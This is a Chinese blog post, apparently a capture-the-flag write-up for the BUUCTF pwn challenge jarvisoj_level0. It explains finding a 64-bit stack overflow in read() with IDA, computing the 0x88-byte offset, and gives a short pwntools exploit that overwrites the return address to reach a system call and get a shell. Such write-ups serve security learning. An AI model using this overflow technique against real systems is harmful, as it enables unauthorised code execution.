本文分享了如何在jarvisoj_level0挑战中,通过64位栈溢出利用技巧,找到system函数地址并构造exploit payload。作者详细描述了IDA分析、栈溢出原理、参数覆盖和最终的exploit实现过程。
[BUUCTF-pwn]——jarvisoj_level0
- 题目地址:https://buuoj.cn/challenges#jarvisoj_level0
- 题目:
还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。
64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数
发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。
再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆盖的返回地址。看过我之前的博文的人都知道,我比较喜欢system压参的位置。
再看看buf这个局部变量,先想要覆盖需要0x80 + 0x8的距离
expolit
from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()
点赞点赞点赞,兄弟们、姐妹们、家人们!!! 😃
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
